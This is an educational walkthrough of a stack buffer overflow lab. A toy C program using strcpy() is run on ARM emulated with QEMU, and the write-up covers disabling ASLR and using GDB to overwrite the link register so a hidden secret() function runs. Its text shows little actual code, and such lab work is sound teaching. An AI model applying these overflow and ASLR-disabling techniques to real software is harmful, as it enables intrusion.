BUFFER OVERFLOW EXPLOITATION ON ARM ARCHITECTURE EMULATED WITH QEMU BY DEBUGGING WITH GDB
- Layout for this exercise:
1 - QEMU
- QEMU (short for Quick Emulator) is a free and open-source hosted hypervisor that performs hardware virtualization (not to be confused with hardware-assisted virtualization).
- QEMU is a hosted virtual machine monitor: it emulates CPUs through dynamic binary translation and provides a set of device models, enabling it to run a variety of unmodified guest operating systems.
- QEMU can also do CPU emulation for user-level processes, allowing applications compiled for one architecture to run on another.
- For further information about QEMU:
https://en.wikipedia.org/wiki/QEMU
http://www.qemu-project.org/
- In this exercise QEMU will be used to emulate the ARM architecture using an Ubuntu virtual machine.
- To set up and enable QEMU on an Ubuntu machine there is a lot of available information on the web. for instance:
https://www.unixmen.com/how-to-install-and-configure-qemu-in-ubuntu/
https://askubuntu.com/questions/138140/how-do-i-install-qemu
- Specially, I strongly recommend this tutorial about Debian Armel and QEMU:
https://www.youtube.com/watch?v=Vxx3miRSOgQ
- After following instructions from previous Debian Armel tutorial, the script LaunchVM.sh is run:
- As a consequence of the script, Debian-Armel with QEMU is finally available:
- Examining the content of Launchvm.sh, there is a redirection to port 2222, what will do easier to handle all the commands and functions:
- Connecting with SSH to the ARM emulation at port 2222 (password = exploit):
3 - Writing, compiling and executing a test program in language C
- Now, let's write a basic program in language C, whose functionality would be to output a welcoming message (WELCOME TO WHITELIST) under a normal operation, as the result of function main() being executed:
- However, due to the presence of the function strcpy() inside vfunction(), there is the chance that using crafted parameter inputs the non-desired function secret() could be executed, displaying a forbidden message (THIS A CONFIDENTIAL INFORMATION):
- strcpy() is a very unsafe function of the C library because according to its prototype char *strcpy(char *dest, const char *src) there is no actual bound checking for input parameters.
https://www.tutorialspoint.com/c_standard_library/c_function_strcpy.htm
- If the source src (input parameter) is bigger than the destination dest (in this case buff[10]) then the remaining bytes will overflow in the memory and will possibly override important areas of memory.
- For further information about Buffer Overflows and strcpy():
https://en.wikipedia.org/wiki/Stack_buffer_overflow
- Compiling the program with GCC and using the -g option, extra debugging information is produced that later will be used by GDB:
- As a result of the compilation, the executable or binary confidential is produced:
- Running the program with a normal input like A, vfunction() is executed after being called by main() and the welcoming message is displayed:
- Let's notice that under normal execution the secret() function is not actually run at all.
4 - Preventing Address Space Layout Randomization (ASLR)
- Address space layout randomization (ASLR) is a computer security technique involved in protection from buffer overflow attacks.
- In order to prevent an attacker from reliably jumping to, for example, a particular exploited function in memory, ASLR randomly arranges the address space positions of key data areas of a process, including the base of the executable and the positions of the stack, heap and libraries:
https://en.wikipedia.org/wiki/Address_space_layout_randomization
- For the purpose of simplicity in this exercise, and to prevent the Linux kernel to run ASLR, we force the value of randomize_va_space to 0:
- Checking that ASLR has been disabled:
- For further information about Linux and ASLR:
https://linux-audit.com/linux-aslr-and-kernelrandomize_va_space-setting/
5 - Analyzing and running the program with debugger GDB
- Now, let's load on GNU Debugger (GDB) the executable program confidential in a non verbose or quiet mode (-q option):
- The program includes three available functions: main(), secret() and vfunction()
- Disassembling main():
- Disassembling vfunction():
- Disassembling secret():
- Setting a breakpoint at the vulnerable function vfunction():
- Remembering that the buffer was initialized with 10 char elements, let's run the program with a normal input parameter "AAAABBBB" (just 8 characters).
- The breakpoint is detected just before executing vfunction():
- Checking the contents of the registers, let's notice that LR (Link Register) holds the address 0x84a8:
- LR (Link Register) is the ARM architecture register in charge of saving the PC (Program Counter), or next instruction to be executed when entering a subroutine.
- In other words, LR stores the address where the program must come back after the subroutine has been completed.
- Controlling LR the whole flow of the program can be controlled, as we'll see later.
- Examining the hexadecimal 10 first values of the stack, before executing vfunction():
- Stepping on one instruction and executing vfunction():
- Now, the parameters AAAA(0x41414141) and BBBB(0x42424242) have been loaded on the stack:
- Continuing the execution up to the end of the program the welcoming message is displayed, as expected:
6 - Overflowing the stack
- Now, instead of entering less than 10 input parameters, let's enter 20 characters (more that the allowed buff[10]):
- Stepping on vfunction():
- Examining the stack the LR has been overwritten with 0x45454545 (corresponding to EEEE):
- Continuing up to the end of the program, there is a Segmentation fault because 0x45454545 is not an executable area of memory address:
- The Segmentation fault occurs because when LR loads 0x45454545 on the PC the program does not find any executable instruction at that memory area.
7 - Controlling the program flow by crafting the input parameter
- Going ahead with the exploitation of the program, let's find at what memory address the secret() functions starts to be run:
- Also:
- Now, instead of the former EEEE parameters let's enter the memory address of the function secret(), so that it is run instead of the normal flow of the execution of the program.
- secret() starts at 0x8438, but to be understood by the ARM processor it must be entered into an hexadecimal Little Endian format. Reversing 0x8438 we have \x38\x84:
- The breakpoint is hit before vfunction() is executed:
- Stepping on:
- Examining the stack, now the LR has been successfully overwritten with 0x00008438 (address where the function secret() starts):
- Continuing up to the end of the program the secret() function is executed and the secret message is finally displayed, instead of the welcoming one:
- From the shell environment, the same result is obtained:
- Let's notice that the remarkable aspect of this exercise is not the development of the Buffer Overflow itself, but the fact that it has been run using a C program executed under an ARM architecture emulated with Debian-Armel and Qemu.